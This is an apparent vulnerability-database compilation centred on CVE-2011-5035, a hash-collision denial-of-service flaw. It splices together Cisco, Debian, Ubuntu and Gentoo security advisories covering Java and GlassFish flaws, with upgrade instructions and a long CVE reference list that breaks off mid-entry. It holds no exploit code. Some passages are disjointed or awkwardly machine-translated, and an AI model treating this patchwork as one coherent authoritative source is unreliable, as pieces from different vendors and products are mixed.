by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to:
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was found during the troubleshooting of a customer
service request.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20110907-nexus.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+-----------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-September-07 | public |
| | | release. |
+-----------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security
notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)
iFcDBQFOZmr4QXnnBKKRMNARCKSXAP4iPvSGkMfQlAfWDwgkkFUCGeP7k7Fvt4G4
ooM8BkN6TQD/dFGTNvjCjHccDg9wUBJrzRtlGv8sdM+2FIeOUR6uS/I=
=i21h
-----END PGP SIGNATURE-----
VAR-201112-0123 | CVE-2011-5035 |
Hash table implementations vulnerable to algorithmic complexity attacks
Related entries in the VARIoT exploits database: VAR-E-201102-0027, VAR-E-201112-0006, VAR-E-201112-0003, VAR-E-201112-0007, VAR-E-201112-0002, VAR-E-201112-0001, VAR-E-201111-0002, VAR-E-201111-0001, VAR-E-201108-0001, VAR-E-201108-0002, VAR-E-201105-0001, VAR-E-201105-0002, VAR-E-201110-0002, VAR-E-201110-0004, VAR-E-201112-0008, VAR-E-201112-0004, VAR-E-201110-0003, VAR-E-200607-0001, VAR-E-200607-0733 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Oracle Glassfish 2.1.1, 3.0.1, and 3.1.1, as used in Communications Server 2.0, Sun Java System Application Server 8.1 and 8.2, and possibly other products, computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters, aka Oracle security ticket S0104869. Some programming language implementations do not sufficiently randomize their hash functions or provide means to limit key collision attacks, which can be leveraged by an unauthenticated attacker to cause a denial-of-service (DoS) condition. Oracle Glassfish Calculates the hash value of the form parameter without restricting the assumption of hash collision. (CPU Resource consumption ) There is a vulnerability that becomes a condition.A third party can send a large amount of crafted parameters to disrupt service operation. (CPU Resource consumption ) There is a possibility of being put into a state. Oracle GlassFish Server is prone to a denial-of-service vulnerability.
An attacker can exploit this issue by sending specially crafted forms in HTTP POST requests.
Oracle GlassFish Server 3.1.1 and prior versions are vulnerable.
Background
==========
IcedTea is a distribution of the Java OpenJDK source code built with
free build tools.
CVE-2011-3377
The Iced Tea browser plugin included in the openjdk-6 package
does not properly enforce the Same Origin Policy on web content
served under a domain name which has a common suffix with the
required domain name.
This could lead to JVM crash or Java sandbox bypass.
CVE-2012-0505
The Java serialization code leaked references to serialization
exceptions, possibly leaking critical objects to untrusted
code in Java applets and applications. This could
have been used to perform modification of the data that should
have been immutable.
For the testing distribution (wheezy) and the unstable distribution
(sid), these problems have been fixed in version 6b24-1.11.1-1.
We recommend that you upgrade your openjdk-6 packages. ============================================================================
Ubuntu Security Notice USN-1373-2
March 01, 2012
openjdk-6b18 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
Summary:
Multiple vulnerabilities in OpenJDK 6 for the ARM architecture have
been fixed.
Software Description:
- openjdk-6b18: Open Source Java implementation
Details:
USN 1373-1 fixed vulnerabilities in OpenJDK 6 in Ubuntu 10.04 LTS,
Ubuntu 10.10 and Ubuntu 11.04 for all architectures except for ARM
(armel). This provides the corresponding OpenJDK 6 update for use
with the ARM (armel) architecture in Ubuntu 10.04 LTS, Ubuntu 10.10
and Ubuntu 11.04.
Original advisory details:
It was discovered that the Java HttpServer class did not limit the
number of headers read from a HTTP request. A remote attacker could
cause a denial of service by sending special requests that trigger
hash collisions predictably. (CVE-2011-5035)
ATTENTION: this update changes previous Java HttpServer class behavior
by limiting the number of request headers to 200. This may be increased
by adjusting the sun.net.httpserver.maxReqHeaders property.
It was discovered that the Java Sound component did not properly
check buffer boundaries. A remote attacker could use this to cause
a denial of service or view confidential data. (CVE-2011-3563)
It was discovered that the Java2D implementation does not properly
check graphics rendering objects before passing them to the native
renderer. A remote attacker could use this to cause a denial of
service or to bypass Java sandbox restrictions. (CVE-2012-0497)
It was discovered that an off-by-one error exists in the Java ZIP
file processing code. An attacker could us this to cause a denial of
service through a maliciously crafted ZIP file. (CVE-2012-0501)
It was discovered that the Java AWT KeyboardFocusManager did not
properly enforce keyboard focus security policy. A remote attacker
could use this with an untrusted application or applet to grab keyboard
focus and possibly expose confidential data. (CVE-2012-0502)
It was discovered that the Java TimeZone class did not properly enforce
security policy around setting the default time zone. A remote attacker
could use this with an untrusted application or applet to set a new
default time zone and bypass Java sandbox restrictions. (CVE-2012-0503)
It was discovered the Java ObjectStreamClass did not throw
an accurately identifiable exception when a deserialization
failure occurred. A remote attacker could use this with
an untrusted application or applet to bypass Java sandbox
restrictions. (CVE-2012-0505)
It was discovered that the Java CORBA implementation did not properly
protect repository identifiers on certain CORBA objects. A remote
attacker could use this to corrupt object data. (CVE-2012-0506)
It was discovered that the Java AtomicReferenceArray class
implementation did not properly check if an array was of
the expected Object[] type. A remote attacker could use this
with a malicious application or applet to bypass Java sandbox
restrictions. (CVE-2012-0507)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 11.04:
icedtea-6-jre-cacao 6b18-1.8.13-0ubuntu1~11.04.1
icedtea-6-jre-jamvm 6b18-1.8.13-0ubuntu1~11.04.1
openjdk-6-jre 6b18-1.8.13-0ubuntu1~11.04.1
openjdk-6-jre-headless 6b18-1.8.13-0ubuntu1~11.04.1
openjdk-6-jre-zero 6b18-1.8.13-0ubuntu1~11.04.1
Ubuntu 10.10:
icedtea-6-jre-cacao 6b18-1.8.13-0ubuntu1~10.10.1
openjdk-6-jre 6b18-1.8.13-0ubuntu1~10.10.1
openjdk-6-jre-headless 6b18-1.8.13-0ubuntu1~10.10.1
openjdk-6-jre-zero 6b18-1.8.13-0ubuntu1~10.10.1
Ubuntu 10.04 LTS:
icedtea-6-jre-cacao 6b18-1.8.13-0ubuntu1~10.04.1
openjdk-6-jre 6b18-1.8.13-0ubuntu1~10.04.1
openjdk-6-jre-headless 6b18-1.8.13-0ubuntu1~10.04.1
openjdk-6-jre-zero 6b18-1.8.13-0ubuntu1~10.04.1
After a standard system update you need to restart any Java applications
or applets to make all the necessary changes.
Fix in AtomicReferenceArray (CVE-2011-3571).
Multiple unspecified vulnerabilities allows remote attackers to affect
confidentiality, integrity, and availability via unknown vectors
(CVE-2012-0498. CVE-2012-0499, CVE-2012-0500).
Issues with some KeyboardFocusManager method (CVE-2012-0502).
Issues with TimeZone class (CVE-2012-0503).
Enhance exception throwing mechanism in ObjectStreamClass
(CVE-2012-0505).
Issues with some method in corba (CVE-2012-0506). The verification
of md5 checksums and GPG signatures is performed automatically for you. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Oracle JRE/JDK: Multiple vulnerabilities
Date: January 27, 2014
Bugs: #404071, #421073, #433094, #438706, #451206, #455174,
#458444, #460360, #466212, #473830, #473980, #488210, #498148
ID: 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in the Oracle JRE/JDK,
allowing attackers to cause unspecified impact.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/sun-jdk <= 1.6.0.45 Vulnerable!
2 dev-java/oracle-jdk-bin < 1.7.0.51 >= 1.7.0.51 *
3 dev-java/sun-jre-bin <= 1.6.0.45 Vulnerable!
4 dev-java/oracle-jre-bin < 1.7.0.51 >= 1.7.0.51 *
5 app-emulation/emul-linux-x86-java
< 1.7.0.51 >= 1.7.0.51 *
-------------------------------------------------------------------
NOTE: Certain packages are still vulnerable. Users should migrate
to another package if one is available or wait for the
existing packages to be marked stable by their
architecture maintainers.
-------------------------------------------------------------------
NOTE: Packages marked with asterisks require manual intervention!
-------------------------------------------------------------------
5 affected packages
Description
===========
Multiple vulnerabilities have been reported in the Oracle Java
implementation. Please review the CVE identifiers referenced below for
details.
Impact
======
An unauthenticated, remote attacker could exploit these vulnerabilities
to execute arbitrary code.
Furthermore, a local or remote attacker could exploit these
vulnerabilities to cause unspecified impact, possibly including remote
execution of arbitrary code.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.51"
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.51"
All users of the precompiled 32-bit Oracle JRE should upgrade to the
latest version:
# emerge --sync
# emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.51"
All Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one
of the newer Oracle packages like dev-java/oracle-jdk-bin or
dev-java/oracle-jre-bin or choose another alternative we provide; eg.
the IBM JDK/JRE or the open source IcedTea.
NOTE: As Oracle has revoked the DLJ license for its Java
implementation, the packages can no longer be updated automatically.
References
==========
[ 1 ] CVE-2011-3563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563
[ 2 ] CVE-2011-5035
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035
[ 3 ] CVE-2012-0497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497
[ 4 ] CVE-2012-0498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0498
[ 5 ] CVE-2012-0499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0499
[ 6 ] CVE-2012-0500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0500
[ 7 ] CVE-2012-0501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501
[ 8 ] CVE-2012-0502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502
[ 9 ] CVE-2012-0503
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503
[ 10 ] CVE-2012-0504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0504
[ 11 ] CVE-2012-0505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505
[ 12 ] CVE-2012-0506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506
[ 13 ] CVE-2012-0507
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0507
[ 14 ] CVE-2012-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547
[ 15 ] CVE-2012-1531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1531
[ 16 ] CVE-2012-1532
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1532
[ 17 ] CVE-2012-1533
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1533
[ 18 ] CVE-2012-1541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1541
[ 19 ] CVE-2012-1682
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1682
[ 20 ] CVE-2012-1711
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711
[ 21 ] CVE-2012-1713
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713
[ 22 ] CVE-2012-1716
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716
[ 23 ] CVE-2012-1717
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717
[ 24 ] CVE-2012-1718
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718
[ 25 ] CVE-2012-1719
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719
[ 26 ] CVE-2012-1721
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1721
[ 27 ] CVE-2012-1722
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1722
[ 28 ] CVE-2012-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723
[ 29 ] CVE-2012-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724
[ 30 ] CVE-2012-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725
[ 31 ] CVE-2012-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726
[ 32 ] CVE-2012-3136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3136
[ 33 ] CVE-2012-3143
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3143
[ 34 ] CVE-2012-3159
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3159
[ 35 ] CVE-2012-3174
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3174
[ 36 ] CVE-2012-3213
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3213
[ 37 ] CVE-2012-3216
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216
[ 38 ] CVE-2012-3342
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3342
[ 39 ] CVE-2012-4416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416
[ 40 ] CVE-2012-4681
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4681
[ 41 ] CVE-2012-5067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5067
[ 42 ] CVE-2012-5068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068
[ 43 ] CVE-2012-5069
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069
[ 44 ] CVE-2012-5070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070
[ 45 ] CVE-2012-5071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071
[ 46 ] CVE-2012-5072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072
[ 47 ] CVE-2012-5073
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073
[ 48 ] CVE-2012-5074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074
[ 49 ] CVE-2012-5075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075
[ 50 ] CVE-2012-5076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076
[ 51 ] CVE-2012-5077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077
[ 52 ] CVE-2012-5079
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5079
[ 53 ] CVE-2012-5081
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081
[ 54 ] CVE-2012-5083
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5083
[ 55 ] CVE-2012-5084
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084
[ 56 ] CVE-2012-5085
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085
[ 57 ] CVE-2012-5086
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086
[ 58 ] CVE-2012-5087
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087
[ 59 ] CVE-2012-5088
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5088
[ 60 ] CVE-2012-5089
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089
[ 61 ] CVE-2013-0169
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169
[ 62 ] CVE-2013-0351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0351
[ 63 ] CVE-2013-0401
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401
[ 64 ] CVE-2013-0402
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0402
[ 65 ] CVE-2013-0409
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0409
[ 66 ] CVE-2013-0419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0419
[ 67 ] CVE-2013-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0422
[ 68 ] CVE-2013-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0423
[ 69 ] CVE-2013-0430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0430
[ 70 ] CVE-2013-0437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0437
[ 71 ] CVE-2013-0438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0438
[ 72 ] CVE-2013-0445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0445
[ 73 ] CVE-2013-0446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0446
[ 74 ] CVE-2013-0448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0448
[ 75 ] CVE-2013-0449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0449
[ 76 ] CVE-2013-0809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809
[ 77 ] CVE-2013-1473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1473
[ 78 ] CVE-2013-1479
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1479
[ 79 ] CVE-2013-1481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1481
[ 80 ] CVE-2013-1484
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484
[ 81 ] CVE-2013-1485
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485
[ 82 ] CVE-2013-1486
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486
[ 83 ] CVE-2013-1487
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1487
[ 84 ] CVE-2013-1488
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488
[ 85 ] CVE-2013-1491
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1491
[ 86 ] CVE-2013-1493
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493
[ 87 ] CVE-2013-1500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500
[ 88 ] CVE-2013-1518
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518
[ 89 ] CVE-2013-1537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537
[ 90 ] CVE-2013-1540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1540
[ 91 ] CVE-2013-1557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557
[ 92 ] CVE-2013-1558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1558
[ 93 ] CVE-2013-1561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1561
[ 94 ] CVE-2013-1563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1563
[ 95 ] CVE-2013-1564
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1564
[ 96 ] CVE-2013-1569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569
[ 97 ] CVE-2013-1571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571
[ 98 ] CVE-2013-2383
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383
[ 99 ] CVE-2013-2384
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384
[ 100 ] CVE-2013-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2394
[ 101 ] CVE-2013-2400
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2400
[ 102 ] CVE-2013-2407
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407
[ 103 ] CVE-2013-2412
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412
[ 104 ] CVE-2013-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2414
[ 105 ] CVE-2013-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415
[ 106 ] CVE-2013-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2416
[ 107 ] CVE-2013-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417
[ 108 ] CVE-2013-2418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2418
[ 109 ] CVE-2013-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419
[ 110 ] CVE-2013-2420
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420
[ 111 ] CVE-2013-2421
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421
[ 112 ] CVE-2013-2422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422
[ 113 ] CVE-2013-2423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423
[ 114 ] CVE-2013-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424
[ 115 ] CVE-2013-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2425
[ 116 ] CVE-2013-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426
[ 117 ] CVE-2013-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2427
[ 118 ] CVE-2013-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2428
[ 119 ] CVE-2013-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429
[ 120 ] CVE-2013-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430
[ 121 ] CVE-2013-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431
[ 122 ] CVE-2013-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2432
[ 123 ] CVE-2013-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2433
[ 124 ] CVE-2013-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2434
[ 125 ] CVE-2013-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2435
[ 126 ] CVE-2013-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436
[ 127 ] CVE-2013-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2437
[ 128 ] CVE-2013-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2438
[ 129 ] CVE-2013-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2439
[ 130 ] CVE-2013-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2440
[ 131 ] CVE-2013-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2442
[ 132 ] CVE-2013-2443
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443
[ 133 ] CVE-2013-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444
[ 134 ] CVE-2013-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445
[ 135 ] CVE-2013-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446
[ 136 ] CVE-2013-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447
[ 137 ] CVE-2013-2448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448
[ 138 ] CVE-2013-2449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449
[ 139 ] CVE-2013-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450
[ 140 ] CVE-2013-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451
[ 141 ] CVE-2013-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452
[ 142 ] CVE-2013-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453
[ 143 ] CVE-2013-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454
[ 144 ] CVE-2013-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455
[ 145 ] CVE-2013-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456
[ 146 ] CVE-2013-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457
[ 147 ] CVE-2013-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458
[ 148 ] CVE-2013-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459
[ 149 ] CVE-2013-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460
[ 150 ] CVE-2013-2461
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461
[ 151 ] CVE-2013-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2462
[ 152 ] CVE-2013-2463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463
[ 153 ] CVE-2013-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2464
[ 154 ] CVE-2013-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465
[ 155 ] CVE-2013-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2466
[ 156 ] CVE-2013-2467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2467
[ 157 ] CVE-2013-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2468
[ 158 ] CVE-2013-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469
[ 159 ] CVE-2013-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470
[ 160 ] CVE-2013-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471
[ 161 ] CVE-2013-2472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472
[ 162 ] CVE-2013-2473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473
[ 163 ] CVE-2013-3743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3743
[ 164 ] CVE-2013-3744
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3744
[ 165 ] CVE-2013-3829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829
[ 166 ] CVE-2013-5772
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772
[ 167 ] CVE-2013-5774
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774
[ 168 ] CVE-2013-5775
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5775
[ 169 ] CVE-2013-5776
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5776
[ 170 ] CVE-2013-5777
